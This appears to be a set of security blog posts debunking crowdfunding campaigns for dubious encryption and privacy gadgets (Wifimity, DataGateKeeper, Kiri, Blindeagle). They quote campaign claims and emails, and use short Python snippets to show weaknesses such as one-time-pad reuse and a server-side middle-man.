Adobe’s 2013 breach affected well over a hundred million people, Home Depot’s hit over 50 million credit cards, and Target’s took about 40 million. These are far larger than the total number of times in history that someone has been affected by an individual running Aircrack at Starbucks. This isn’t to say that compromised wireless networks are not a threat, but these frequent “wifi protector” KickStarters all come back to the notion that user wifi insecurity is interchangeable with anything the layman would identify as “hacking”.

Here’s something we’ve seen before (see Sever) that makes us wonder if and how it defies the laws of physics:

Faster Surf: With this option activated you can increase up to 50% your browsing speed.
Speed: It doesn’t reduce your device speed because it runs out of your mobile, tablet, or PC.

Now there are some possibilities for this claim; they could include the following:

  • It removes half of the content that makes a website slow to load. Website bloat is a real thing: just by running an ad blocker or turning on certain browser features, pages do load faster. But where is the device doing this processing?
  • It compresses and decompresses every single thing that comes in and out, in addition to providing an encrypted tunnel. How is this possible with a device that, judging by its housing, is probably nothing more than a basic low-power ARM-based device? They claim it won’t slow down your PC either, so again, where is it doing this?
  • They have no idea what they’re talking about and have no specific plan as to how they would make everything faster.

The first seems the most probable, as they link to an article from the Wall Street Journal about tracking cookies. Their concern over “price discrimination” – that your Internet activity will lead to online stores increasing prices on you, insurance companies increasing fees, and banks raising interest rates – has some merit, but these issues can be solved by the typical user with the tools included in every modern web browser. There is no need to throw money at a €140 device when all of this can be done for free.

There are hints that maybe they really don’t know what they’re talking about, however; at the start of the KickStarter page, there’s a statement about AES reminiscent of DataGateKeeper:

“AES is the first (and only) publicly accessible cipher approved by the National Security Agency (NSA)..”

Really? I don’t suppose that they’ve heard of DES, have they? If you’re going to sell a cryptography product, it would be good to at least know a thing or two about the development of the algorithms.

More than 1,000,000 times the capacity of the Apollo 11 computer.

What do they mean by “capacity”? If we go by the storage capacity of the Apollo Guidance Computer (a computer that is 50 years old), which had 36 kilobytes of storage (in ROM), then 1,000,000 times that capacity is about 34 GB; call it 32 GB in practice. This is in no way a large amount of data by modern standards.
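The arithmetic, using the 36 KB ROM figure above:

```python
# Sanity-checking the "1,000,000 times the capacity" boast against the
# Apollo Guidance Computer's roughly 36 KB of fixed (ROM) memory.
agc_rom_bytes = 36 * 1024                  # ~36 KB of rope-core ROM
claimed_bytes = agc_rom_bytes * 1_000_000  # "1,000,000 times the capacity"
print(claimed_bytes / 2**30)               # ~34.3 GiB, i.e. a 32 GB flash part
```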

The specifications given for the device make no sense

Wifimity has provided a hypothetical specification for their keychain-sized device:

32 bits high speed microprocessor.
Cryptochip, high level security by hardware.
WiFi 2.4GHz chip or bluetooth BLE.
A battery 500mA with an intelligent charge system for long life.
A custom operative system (OS) to avoid hacking.

A 32-bit “high-speed microprocessor” is more or less the standard for devices these days (it’s later described to be a 32-bit ARM Cortex-based processor).  Their “cryptochip” appears to be a hardware implementation of AES, and 2.4 GHz wireless and Bluetooth are what I expect, but the rest of this just doesn’t hold water.

On the subject of cryptography, why is this using TLS 1.0? It’s vulnerable to BEAST, and POODLE-style padding attacks have been demonstrated against some TLS implementations as well. How was this overlooked? I guess this “custom [operating] system” that has been created to “avoid hacking” will take care of that problem, right?
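For contrast, setting a protocol floor is a one-liner in any modern TLS stack; here is a sketch using Python’s standard-library ssl module (3.7 or later):

```python
# Refusing legacy protocol versions: with a minimum of TLS 1.2,
# BEAST-era TLS 1.0 (and 1.1) handshakes are rejected outright.
import ssl

ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse TLS 1.0/1.1
print(ctx.minimum_version)
```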

The cryptography doesn’t really make sense either considering this snapshot from one of the videos:

Screen Shot 2016-06-22 at 19.11.51

I can turn off encryption? I can turn off device cloaking and anonymizing options?

It gets weirder when you realise what the options at the top of the displayed webpage are for:

Screen Shot 2016-06-22 at 19.12.21

Oh wow. It just inserts a frame at the top? What’s the point of this device? Why is it not doing this passively? Does this mean that Facebook and other applications that do not make use of the mobile device’s browser do not get the same level of protection?

Nonsense. If we go back to the encryption part again, we see this gem as part of their stretch goals if they manage to achieve €250,000 in funding:

We keep a lot of important information in our cloud and this goal is to sure that it is safe and the all copies are unreadable in case we delete the cloud info.

So are they storing all your data on their own servers in cleartext unless they hit this stretch goal?  Or is this a clumsy restatement of their earlier claims about “encrypting your cloud”?

None of these features require a fancy device sitting between the user and a server to make it happen. In fact, this does nothing to solve the problem that the campaign seeks to resolve.

Who are these people?

As with previous exposés on this website, we like to document who’s leading these campaigns, as information on their backgrounds helps to discern between scammers and optimists. Unlike previous campaigns, there is very little information given on who’s behind it. This is evident in this passage:

Together with our team, we take our passion for innovation beyond our products and into every decision we make. In our product development process, simplifying people’s lives has always driven us at every stage. Simple products that can help people.

Pablo, our SEO, with several patents registered, has worked for more than 25 years in custom electronic projects. He has developed complex algorithms in collaboration with the mathematics department of UPV University and has made modems for GPRS, modems narrow band, and WiFi systems with encrypted solutions.

“Pablo” is actually “Pablo Jose Reig Gurrea”, CEO of Ladegar in Bilbao, Spain. His KickStarter profile is a bit more detailed:

Pablo is currently the CEO of Ladeger, company that develops technologic solutions for the consumer market. He graduated in Electronic engineering and worked more than 25 years in tailor-made solutions for industry, in British and German multinational companies. He has several patents registered and used to collaborate with the UPV university for developing algorithms and custom made solutions.

His prior work explains how he was able to build a demonstration device that appears to work as well as it does, but there is little to no evidence of his involvement in information security prior to this campaign. No website for his company appears to exist.

We get the impression however that Pablo is unsure of how his product will be assembled, as evident in this image:


But then it’s stated they’re still in negotiations over where it will be made:

We are in negotiations to manufacture in two plants, one in Albuquerque, USA for the American and Canadian market. “Made in USA.”

And the other in Bilbao, Spain for the European market. “Made in Europe.”

So it has gone from “will be” to “in negotiations”? Also, just to be clear, Canada would not accept a “Made in USA” label.

We don’t expect this campaign to succeed.

Wifimity - Passwords & Surf Safe with Just a Key ring! -- Kicktraq Mini

MyDataAngel ends KickStarter and then feigns being a victim

We’ve previously covered this campaign in several entries, and we’re happy to report that the individuals behind the MyDataAngel/DataGateKeeper KickStarter campaign have cancelled their project just a few hours before it was expected to fail.

However, it appears that they won’t go out without kicking and screaming and have thus issued a rebuttal directed at those of us who tweeted and blogged about them in a manner that was to their displeasure.

“It is not a field of a few acres of ground, but a cause, that we are defending, and whether we defeat the enemy in one battle, or by degrees, the consequences will be the same.” Thomas Paine, 1777

Dear DataGateKeeper Software Backers,

No truer words were ever spoken. As true in 1777, as it is nearly 240 years later.

You are true Data Angels; your foresight in the face of aggressive and salacious attacks from the fringe is a testament to your fortitude and an inspiration to us. You will have your DataGateKeeper. Our resolve to deliver to you the DataGateKeeper Total Data Protection Software™ and SafeDataZone™ has never been greater.

We are finalizing the release of the DataGateKeeper on the Windows platform, and the development and stress testing of the Android and Apple platforms.

We launched our Kickstarter campaign to test both our message and the market. Unfortunately, we did not gain perspective on either issue. A key driver for success on any crowdfunding platform is getting the word out on social media. On this matter, we failed you, as we elected to cancel all of our promotional efforts, nearly immediately. Why?

We felt this action was the most responsible avenue to take once the fringe quasi-InfoSec wannabe community began attacking you, our DataGateKeeper Backers. We have never seen anything like that and likely, no campaign has ever had Backers personally attacked for making a Pledge.

These miscreants did not Pledge for any Rewards, however, they used a loophole, in this platform to disrupt and gain access to you, our Backers, which is reprehensible. The twittidiots and their ilk even attacked our employees and supporters – all anonymously. We apologize to our DataGateKeeper Backers and Team for any offense or verbal attacks you sustained.

In addition, we had several “journalists” contact us to do a “story” for their “readers”. We also elected not to engage them for several reasons; the well had been poisoned, our message had been diluted, and their intentions and loss of objectivity had been made clear by their online social media activity.

During the campaign, we engaged these crypto-crazies in an effort to understand their boggle. As is typical of any engagement with flakes that hide behind anonymity, the 80/20 Rule was in full force. 80% of the twittidiots could not conjugate a response, while 20%, who did not hide behind their twitter account, proved to be helpful, and we had productive conversations. We thank them here.

What Did We Learn?

  • Controlling the message is important, however, controlling the environment for that message is critical. Today we will move to control both the message and the environment. We believe in the first amendment, however not at the expense of decorum, respect for others’ opinion and dignity.
  • Given the plethora of crowdfunding sites available in the market, the Kickstarter platform is likely not the best platform for software, absent a techie gadget connection or video game. Software clearly underperforms on this platform.

What are We Prepared to do for Our DataGateKeeper Software Backers?

  • We are going to complete our DataGateKeeper Total Data Security Software and make it available to you first for the price you Pledged and for the Reward you Backed. We are currently arranging to do this very thing.

DataGateKeeper Backers, you have our private email address, we look forward to continued communications. Please contact your Data Angel Team if you have any further questions.

It’s interesting that they quoted from Thomas Paine’s American Crisis, a series of pamphlets meant to encourage American colonists to support a war against Great Britain, invoking divine providence to suggest they would prevail against the Crown. In the case of Raymond Talarico and his crew, apparently the request for accountability is the real tyranny, and thus is definitely worth fighting a war against.

As one person put it to me: MyDataAngel believes that they’re the “founding fathers” of truly-secure encryption. If you have a problem with this, then you must hate America. Well, MyDataAngel, I guess that since I am Canadian and thus a subject of the Crown, I really am hellbent on this idea.

Why you actually failed

You waged a fierce and determined campaign against any kind of investigation or scrutiny. You made outrageous claims about your software’s functionality. You refused to answer any of the technical questions asked of you in earnest. You complained bitterly when, in the absence of technical content, we instead analyzed your staff’s backgrounds for plausible competence in the field of information security.  Information security is not a field that has much patience for secrecy, and you’re exactly why.

You claim that 20% of the respondents on Twitter were “helpful”. Of course, this can’t be backed up with data, because you’ve gone and made your account private. Fortunately, I am still following you, and can read a random sampling of these tweets; none of them seem to indicate that they were “helpful” at all. They really are just calling you out on your nonsense.

You complain about the unwashed masses of anonymous “crypto-crazies”, nameless “twittidiots” (shouldn’t it be “twidiots”?), or unspecified members of the “fringe quasi-InfoSec wannabe community” attacking you via social media.  In my case, this is demonstrably untrue; I first wrote about MyDataAngel on my own personal blog, with my full real name in the page header and the URL.  I also wrote to you with my personal e-mail address, as I’ll discuss later.

You, meanwhile, really don’t like being identified. We’ve reached out to a number of your former business partners and none of them returned our e-mails. All we can find are community forum posts from people who work at a single-person company or press releases making wild claims about your product and a supposed partnership with another seemingly single-person company. One is left to wonder why a multi-billion dollar company hasn’t snatched your product up.

After being called out on your claims of “512 KB” encryption strength, you edited them to reflect something more plausible, yet made no attempt to explain why the change was made: you went from claiming “512 KB” encryption to just “512”, without mentioning the word “bit”. This calls into question whether you know what the number 512 is meant to measure in this context.

There are other reasons to suspect that you don’t know anything about cryptography.  Here’s a tweet where you try to coyly hint at what encryption algorithm you’re using:


Truly bizarre to suggest that Huffman coding, a 1952 algorithm (almost half a century before AES was ratified, and so presumably “too old” by your standards), is encryption when in fact it’s compression, used as a basis for the PKZIP, JPEG, GZIP, and MP3 file formats, to name a few.
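The distinction is easy to demonstrate: DEFLATE, the algorithm behind zlib, gzip and PKZIP, uses Huffman coding internally, and anyone can reverse it without any key at all:

```python
# Compression is keyless and reversible by anyone; that's the whole
# point, and it's exactly why it is not encryption.
import zlib

message = b"attack at dawn, attack at dawn, attack at dawn"
packed = zlib.compress(message)  # compact, but in no sense secret
print(zlib.decompress(packed))   # recovered without any key
```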

In a similar vein, before you took down your website, it was providing explanations about cryptography concepts plagiarized from various books and Wikipedia:


Whether or not you know what you’re doing with cryptography, you’ve clearly already gone ahead and built the Windows version of your encryption software. A demonstration copy was supposedly made available when it was still known as Centuri Cryptor. We can see in this YouTube video from when it was known as FileWarden that it was already working.


Since you clearly have a functional product already, it’s only natural that I’d want to test it!  As mentioned above, I reached out to you regarding a demonstration of your application. Here’s the e-mail exchange:

From: Colin Keigher
Sent: Friday, May 13, 2016 11:56 AM
Subject: Interested in a demo

Hi there,

I’d like a copy of your software to demo and test. Please let me know how I can review this.


Subject: RE: Interested in a demo
Date: Friday, May 13, 2016 11:59 AM
From: “Hack Me If You Can” <>
To: “‘Colin Keigher'”, <>


We respect anonymity so we won’t ask you for any identifying information
about who you are.

Having said that — We have two questions?

1. Would you please tell us a little about yourself.

2. Or recommend someone you think would take on this Challenge. We want to choose someone the community respects and trusts.

Back to all qualified entrants on May 16.

Your Data Angel Team

From: Colin Keigher
Sent: Friday, May 13, 2016 12:14 PM
To: Hack Me If You Can <>
Subject: RE: Interested in a demo

Hi there,

Thanks for getting back to me. I have some follow up questions.

1. What are you looking for here? I am a security engineer who runs his own company.
2. In what sense do you mean “someone the community respects and trusts”? What are your qualifiers?


Subject: RE: Interested in a demo
Date: Friday, May 13, 2016 1:08 PM
From: “HackMeIfYouCan” <>
To: “‘Colin Keigher'”
Copy: “‘Hack Me If You Can'” <>

Hi Colin,

We’ll do our due diligence, and, following, chose those parties whom represents the largest demo vis-a’-vis followers, trust and respect.

We believe this plan is likely the best practice for achieving our goal.

We are open to suggestions as to criteria, and welcome yours and the communities opinion on our selection criteria.

You Data Angel Team

Your last response suggests that you’ll be hand-picking the parties you “trust” and “respect”. Concealing your encryption algorithm isn’t going to make it any more secure; it’s just going to attract more suspicion. If you want to have some level of credibility, you’re going to have to allow people to test your algorithm without vetting them, because you don’t get to vet the real attackers when they’re after your real customers’ data. If you had the confidence in your software that your advertising copy suggests, you’d gladly let me or anyone else publicly test it out with no restrictions beyond not sharing the software with others.

The information security community takes claims like yours seriously, which is why we have been so ardent in criticizing you. Documenting charlatans and bad organizations is a time-worn hobby for this community. You cannot expect to pull a fast one on us, because the tricks you’re attempting to pull are far from new.

We think the real reason you insist on the crowd-funding model is that you know your claims are nonsense and that nobody well-informed about your product would choose to spend money on it, much less trust it with important secrets. This is why you set the KickStarter goal at a piddly $20,000 USD to fund a team of nine people, and it’s why you would then pad out your total with a few high-dollar-value backers: it lets you turn to potential investors and claim that there’s consumer interest in your product.

You close off stating that KickStarter was not the place to launch your project and that you’re going to look at other options; we’ll close off by suggesting that you do not.

DYC Studio posts an update on Kiri

Last week, we published details on Kiri, a project that promises to make you anonymous on the Internet with a $40 USD Raspberry Pi and some lifted code. On June 3rd, Taheer Jokhia posted an update on the KickStarter:

Closed Source GP2 License Issues

It has come to light that we will not be able to distribute our code as closed-source. Therefore we are announcing that Kiri OS will be open-source and made available to the public.

About Dyc Studio and some history on Kiri

Please note: Employees of Dyc Studio have chosen to stay anonymous for their own personal reasons, so they will not be named. Please respect this. 

Dyc Studio started as a design company in 2010. During that time the company was very small and not yet registered as the private limited company it is today and our managing director, Taheer, had begun learning the fundamentals of cyber security. About a year later Dyc Studio moved on to start producing websites and software for various companies at a very small scale. Over time (until 2015) the company grew, gained more clients and eventually became a registered company, still only with 2 employees; the director and a designer. As for Kiri OS, our director, Taheer began development on it in 2013 and has been slowly building it’s components since then.

It was only during the beginning of 2016 that Taheer decided that Kiri OS should be distributed to the world, however he knew it would not be complete for at least another 5 years. So he reached out to friends and family in search of help. He gained one extra developer who is experienced in cyber security to help out. In February 2016, the team had become 3 people; Taheer, another software engineer and a designer. It was then the team decided Kiri OS needs external funding to pay for the team to work on Kiri fulltime as well as hire extra help, so we began focusing on a Kickstarter campaign and put all development on standby until the team is able to work full-time on it.

I hope this clears things up for a lot of you.

You’d think that Taheer would have at least read the licence while going over the source code he was trying to lift for this Kiri project.

Based on a CV posted on one of DYC Studio’s websites from around 2012 (we have opted to not share a copy of this due to it revealing some personal information), there is no indication of an interest in cyber security, operating system development, or anything that would inspire some level of confidence in the project.

This is an excerpt from said CV:

Weirdly, the CV is shared between him and his former business partner. Being that said business partner does not appear to be involved any further and that Taheer has asked that we respect privacy for his anonymous (read: “probably fake”) employees, we won’t name him.

Taheer should also update his LinkedIn profile because so far I just see that he’s into marketing and web design:

Screen Shot 2016-06-05 at 22.20.58

We see software development, game development, and app development, but how about languages? How about cyber security? You updated your profile to state that you’re doing a KickStarter, but haven’t updated it to tell us more about your development past?

Also, when did DYC Studio start? 2011 or 2008? Your weird CV says 2011, your other LinkedIn profile says 2011, and yet your current one says 2008? Are you a Director or are you a Founder?

It also does appear that we’ve touched a nerve:

Screen Shot 2016-06-05 at 22.40.05

If you want to raise money for your lifted OS, you could at least try and lie better. You already engage in spamming as part of DYC Studio, so you’d think that you would have picked up a few tricks by now.

Please provide us with a copy of the source code to ease confusion.

Kiri - The Anonymous Computer -- Kicktraq Mini

Kickstop the Blind Ego

With permission from the original author, we are reposting details on a failed KickStarter project called “Blindeagle”. It was cancelled by its creator on April 12th after achieving less than 10% of its goal.

Blindeagle is asking for money for a product that promises private and secure communication with anyone over the internet, and wants €90,000 to do it. For an additional €920,000, they’ll even remake what RedPhone already does for free. With a price tag like that, it had better not just be useful but live up to every one of its promises. What are those promises, anyway?

The advertised unit is a keychain that plugs into the headphone jack of a mobile device and is meant to interact with a closed-source app to provide impenetrable crypto. This crypto is said to use a one-time pad (OTP) system. The design, photos, prototype, and social networking vibe all feel too similar to the vaporware you’d expect a San Francisco-based startup of 5 college students to poorly slap together and unload on unsuspecting venture capital firms for a million in seed money, who are later forced to abandon the broken concept and cut their losses. But it’s not like that: these 5 college students are from Belgium!

The broken English, consisting primarily of hype-speak and buzzwords, makes it difficult to extract hard data, so building a critique of the supposedly infallible security model wasn’t easy. By focusing only on the major claims, and not nitpicking general hyperbole, we show this product for the fraud it really is: a broken security model rife with contradictions, in the best case simply dangerous for its users, and in the worst an intentional scam surrounded by lies.

Why be so hard on a KickStarter that will likely never meet its goals in the first place? Because this campaign masquerades as an infallible solution to a current global crisis in data privacy, capitalizing on people’s fears and ignorance while overpromising and dangerously underthinking a science that often means the difference between life and death. Cryptography is the backbone of all security on the internet, and doing it right has always been undeniably hard. If a team of expert cryptographers were working on this device, we’d be prepared to give them some leeway to explain themselves, open source it, and work on it over the years, as Telegram was given a chance to do at first… except there is no team of cryptographers, not even a “math expert”. So who is the savior that will guide us through this privacy crisis?

No background in crypto

Meet David (no last name provided). With no crypto background and “now over 5 years of experience in Java, web and iOS/OS X development”, “he .. takes care of the technical side of blindeagle, from the website to the apps and including programming the servers and the external units”. Let’s not be too hard on David; he’s likely been suckered into this by a friend and is either too naive to realize the ramifications or is ignorant and being used as a fall guy by a scammer. Assuming he hasn’t singlehandedly broken the underlying security of everything through human error, miscalculation, an improper security model, or a complete and utter lack of proper crypto background or experience, we can move on to the message and leave the messenger be for now.


As quoted from their product homepage, using their device “guarantee[s] you total confidentiality and absolute security”. That’s quite a claim to make, especially since it’s impossible. Every legitimate cryptographic tool or product in the world is designed with the understanding that as time passes, the likelihood of its security being compromised only increases; vigilance, not a blanket promise of trust, is the backbone of true security. Security is not a fixed state, it is an evolving process. Does Blindeagle understand that process? Given that we’re asked to trust closed-source apps written entirely by David, running against closed-source devices manufactured by an unknown third-party supplier, the picture looks pretty grim. Despite several free, secure applications that do encryption “right” (XMPP+OTR, BitMessage, Tox), we’re to believe that we need a separate closed-source device. What does that device even do?

Magic box

The device purports to feed one-time Vernam cipher keys from a pool stored in its memory directly to the mobile app. A properly implemented Vernam cipher (and a one-time pad in general) can be extremely secure, but the difference between broken and sound cryptography often lies in the implementation. While claiming to be infallible compared to email or other chat apps, the copy fails to describe in any detail whatsoever how this particular implementation defends against interception by a rogue app on a rooted phone, sniffing over the air via the device itself, or any number of other attack vectors. That would take actual knowledge!
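Blindeagle publishes no code, so we can only sketch the mechanics ourselves. A Vernam cipher is just a byte-wise XOR against pad material, and the classic failure mode — the one any implementation must rule out — is pad reuse. A minimal illustration (all names ours, not theirs):

```python
import os

def vernam(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the corresponding key byte.
    Only secure if the key is truly random, at least as long
    as the data, and never reused."""
    assert len(key) >= len(data)
    return bytes(d ^ k for d, k in zip(data, key))

key = os.urandom(16)
m1 = b"attack at dawn!!"
m2 = b"retreat at nine!"

c1 = vernam(m1, key)
c2 = vernam(m2, key)  # pad reuse: the classic "two-time pad" mistake

# An eavesdropper who sees both ciphertexts can XOR them together,
# cancelling the key entirely and leaving m1 XOR m2 in the clear:
leak = bytes(a ^ b for a, b in zip(c1, c2))
assert leak == bytes(a ^ b for a, b in zip(m1, m2))
```

The XOR itself is trivially correct; everything hinges on how the pad is generated, delivered and destroyed — exactly the parts Blindeagle never explains.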

Weak magic

No, instead we are led to believe that the infallible OTP key material preloaded onto the device at manufacturing has not been copied or tampered with in any way, and has been loaded so securely that it could not be extracted through a simple buffer overflow or injection attack. Key material generated when you plug the device in might yield secure keys, but trusting their third-party manufacturer pushes the boundaries of what can be considered “secure”. Keys generated by the company could be stored and used to decrypt all your messages at any point in time. And even if the company weren’t malicious, what’s to stop a malicious nation-state actor forcing them to hand over every single key they produce? Whilst some of this is mitigated by the plausible deniability an OTP system provides, they only supply 2 GB of material: that is 2,147,483,648 bytes of key material. Computers are incredibly fast at simple XOR operations, and a computer could sweep all 2 GB of key material against a captured message in a matter of minutes. Compare this to the seed files used for serious OTP deployments, which often run to terabytes precisely so that an attacker cannot simply load the whole seed into memory.
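To put numbers on that: if an attacker ever obtains a copy of the pool (from the manufacturer, the company, or the device itself), finding which slice encrypted a given message is a linear XOR scan with a guessed plaintext fragment (a “crib”). A toy sketch, with a 256 KiB pool standing in for the 2 GB one and all offsets and names hypothetical:

```python
import os

def scan_pool(pool: bytes, ciphertext: bytes, crib: bytes):
    """Slide a guessed plaintext fragment across every offset of a
    leaked key pool; wherever pool XOR ciphertext reproduces the
    crib, we have located the key slice used for the message."""
    hits = []
    for off in range(len(pool) - len(crib) + 1):
        if all(pool[off + i] ^ ciphertext[i] == crib[i]
               for i in range(len(crib))):
            hits.append(off)
    return hits

pool = os.urandom(1 << 18)   # 256 KiB stand-in; the scan scales linearly
offset = 100_000             # hypothetical slice the device happened to use
msg = b"Subject: secret plans"
ct = bytes(m ^ k for m, k in zip(msg, pool[offset:offset + len(msg)]))

hits = scan_pool(pool, ct, b"Subject: ")
print(hits)  # 100000 will be among the hits
```

Even this naive pure-Python loop covers the 256 KiB pool in well under a second; optimized code sweeping the full 2 GB is a lunch-break job, not a cryptographic barrier.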

Powered by buzzwords

According to the copy, “the key existing in the external unit is generated using quantum phenomena”. This is buzz-speak for “a mirror sensor looks at light and makes a key based on the photo it takes”. While interesting in theory, any theory that cryptographic security rests on should be tested and proven before going into production. The copy goes on to guarantee that the keys in the device can only be used once, that it behaves as single-use memory. Except if somebody copies the key data. Recall that the device plugs into the headphone port on your phone. Putting aside the logistics of getting a device like this to work on a computer without a combined headphone and microphone socket, what’s to stop a malicious app pretending to be the official app, reading in all of the key data, and simply saving it to local storage? Blindeagle provides no technical explanation of how this can be prevented, aside from a brief introduction to “potting”.

The straw that broke the crypto’s back

Among the claims of perfect crypto is the use of “end to end encryption”: something that is, by definition, readable by only two parties and is unbreakable unless the underlying crypto is broken or a key materializes. End-to-end crypto, if done right, is a good thing, and Blindeagle would be silly not to include it as a main feature. But is Blindeagle truly end-to-end encrypted?

After data is encrypted using your Blindeagle device, it is sent to their closed-source, proprietary servers in the EU. From that point, the data is “decrypt[ed] with the sender key followed by the instantaneous encryption with the receiver key, just before the destruction of the encryption keys”. If you are thinking to yourself, “isn’t that the definition of a middle-man?”, you’re likely more suited to lead their team than poor David.
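Their own description can be sketched in a few lines; the names are ours, but the flow is theirs, and the point is that the intermediate plaintext necessarily exists on the server:

```python
import os

def xor(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR, standing in for their pad-based encryption."""
    return bytes(d ^ k for d, k in zip(data, key))

# Hypothetical reconstruction of the advertised flow: the server holds
# both the sender's and the receiver's pads.
sender_key = os.urandom(32)
receiver_key = os.urandom(32)

msg = b"meet me at midnight"
wire_in = xor(msg, sender_key)           # sender -> server

# --- on Blindeagle's server ---
plaintext = xor(wire_in, sender_key)     # server MUST decrypt first...
assert plaintext == msg                  # ...and here it is, in the clear
wire_out = xor(plaintext, receiver_key)  # ...before re-encrypting

# --- on the receiver ---
assert xor(wire_out, receiver_key) == msg
```

However “instantaneous” the re-encryption and however quickly the keys are destroyed afterwards, the server sees the plaintext. That is the opposite of end-to-end.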

Blindeagle prominently advertises that “no data is stored on our servers”, in addition to citing the lack of data-retention laws in Belgium. These claims are empty and unprovable; we have learned from experience and from leaks that neither nation-state actors nor hackers ask permission, nor do they follow laws, when hijacking, injecting, seizing or bugging servers for their own malicious purposes. By deliberately introducing a middle-man into their transport protocol, they cannot claim with any certainty that no data will be stored.


Blindeagle’s security model does not meet the requirements of even the most basic security theory, its advertised implementation is dangerous, and its claims are contradictory, misleading and at times downright lies. At this point it would be preferable if it ends up being a non-delivering scam.

Written mostly by sn0wmonster from the ##crypto IRC on freenode, with some technical input from SunDwarf.

DataGateKeeper is no longer “impenetrable” but now “engineered”

If you look at the original Kickstarter, you’ll see that it used to show the following:

Screen Shot 2016-06-03 at 13.11.06

Now it has been edited to show that it is no longer “impenetrable”, but “engineered”:

Screen Shot 2016-06-03 at 13.10.55

There have been several other changes to the Kickstarter as well.

This was the original text with their take on the “backdoors” in AES:

In the late 1990’s, AES, while under ‘well-intentioned’ government oversight, somehow, a ‘back-door’ found its way into this ‘approved’ data security solution, — as has been widely reported. The unintended consequences of this back-door allows for complete access to your data, without your permission, to data monitoring, data-mining and active eavesdropping.  Effectively, voiding your right to privacy and confidently. So common is this practice it has a name: Active Snooping.

Now it has been changed to “flaws”:

In the late 1990’s, while under ‘well-intentioned’ government oversight, flaws found their way into this ‘approved’ data security solution, — as has been widely reported (see, notes below). The unintended consequences of these flaws allows for complete access to your private and confidential data, without your permission, promoting underground data monitoring, data-mining and active eavesdropping. So common is this practice it has a name: Active Snooping.

This paragraph has been removed:

Simply, ‘the other guys’ use standard SSL (Secure Sockets Layer), and the failing AES, in an attempt to secure your Privacy & Confidentiality. The same data security hackers took advantage of in the breach of Target, Home Depot, iCloud, Sony, Anthem…you get the idea. You Deserve Better.

All that replaced it was its last sentence.

In an attempt to make themselves appear more open, they decided to remove the tripe about the levels of encryption and replace it with a story about their plans to improve the software.

The R&D Plan

To build the DataGateKeeper, we disassembled and reverse engineered several automated password cracking software programs. This was to understand their procedural sequence and methodologies related to code acquisition, code cracking, or as it is known, hashed access to code and source. Additionally, we decompiled these programs to gain insight on hacking software’s proclivity to exploit weakness in cycle rates, including their integrated and powerful automation multipliers, and natural GPU processor affinity. Following months research we had what we needed to protect you.

This seems like complete nonsense. As we covered in our previous exposé on this Kickstarter, the project has been floating about for years and has changed hands a handful of times. At no point have we seen any evidence that they’ve spent any time researching automated password-cracking applications.

Furthermore, that second-to-last sentence? It doesn’t make any sense and reads like something out of Reddit’s VX Junkies. Much of the above already existed back when it was labeled “The Math”, a section which is no longer on the page.

Validation Plan

Now that our cryptographic module is complete, we plan to submit our DataGateKeeper module for independent validation the sooner of; official final publication of the NIST pronouncement on the Federal Register seeking comment to portions of 19790 (deemed 19790:2014), to update 140-2, or, the official abandonment of such update. We plan to use Underwriters Laboratory (UL), however, there are several certified laboratories performing FIPS certification. Following validation and patent (currently, we rely on trade secret to protect our algorithm) we will release our algorithm to the select members of the cryptographic community for further development and analysis under a very specific set of guidelines which we will solely determine.

Oh. So is there a patent pending for this, or are you still keeping it close to your chest? I did a cursory search on Google Patents using various names and keywords relating to this project, and nothing came up relating to this encryption suite of yours.

You rag on AES encryption here yet mention no other cipher. If you look at the FIPS 140-2 validation list, you’ll notice that you’re facing an uphill battle to get your fancy, never-before-seen cipher validated.

Open Source

Before you ask or comment, we have no plans to release any portion or portions of our code as Open Source. Those of you in the software community who are Open Source advocates are welcome to invest your time, effort and capital to develop a competitive data security solution and release it as Open Source…we encourage it. Go getem’ champs.

I’m certain that if you ever release this software, we’ll figure out how to break it without much effort.

Vulnerability Coordination & Bug Bounty Platform

We are currently coordinating efforts to provide the DataGateKeeper under strict guidelines to one or more vulnerability coordination platforms, such as Hackerone. Our plan includes inviting, predetermined, preselected software testers to leverage their skills and creativity to undertake periodic reviews of our data security solution to inspect for vulnerabilities and assist us future planning and software updates. We will use this form of Bug Bounty Platform to provide independent testers a voice to aid us in future developments and testing before updates are published.

We don’t see you listed on HackerOne yet.

They’ve also changed who they’re going to give part of the proceeds to after the Kickstarter. Here’s the original statement:

is proudly participating in Kicking It Forward Initiative, promising to pledge 5% of its post-release profit to other Kickstarter projects.

And now they’re just going to give their software to an organization of a backer’s choice instead of money to Kicking It Forward:

When you visit our website you will see we plan to make available, two versions of our DataGateKeeper software. One available here on Kickstarter, our Civilian version, at 512-bit, and a second 768-bit version for our First Responders, Active Duty and retired Military personnel. We designed the 768-bit version of the DataGateKeeper for those individuals who protect us and run into danger so we don’t have to.

As a thank you to you and the Kickstarter community for supporting us, for every reward pledge we receive for our DataGateKeeper software during this campaign. We will award a complimentary lifetime subscription of our 768-bit First Responder DataGateKeeper Software including 500GB of our SafeDataZone in your name to one of the organizations listed in our post campaign survey, tending to the people who protect our lives and our liberty. They should not have to worry about data theft when their mission is far greater.

Support “are” troops, right? Nothing says patriotism like shoving bogus crapware onto veterans.

In a (not so) surprising move, they’ve gone and removed any details about themselves from the Kickstarter, minus a few quips remaining in the bottom text. For posterity, here’s a mirrored copy:


Again, these people are:

  • Raymond Talarico, CEO
  • Debra Towsley, President (and wife of Raymond)
  • Frank Ruppen, Chief Strategy Officer
  • Joshua Noel, Creative Director
  • Loreena Stanga, Cat Herder & Code Management
  • Jensen Dillard, Data Angel Host
  • Steve Talbot, Advisory Board
  • Chad Thilborger, Data Angel & Host
  • David Smith, Advisory Board
  • Frankie, Data Angel & Celebrity

If you’re trying to make yourselves seem more legitimate, removing details about who is on your team late in the game is not a way to do it.

DataGateKeeper: The FIRST Impenetrable Anti-Hacking Software -- Kicktraq Mini

If this makes it to $20,000 by the end of the campaign, they’ve had someone pump it.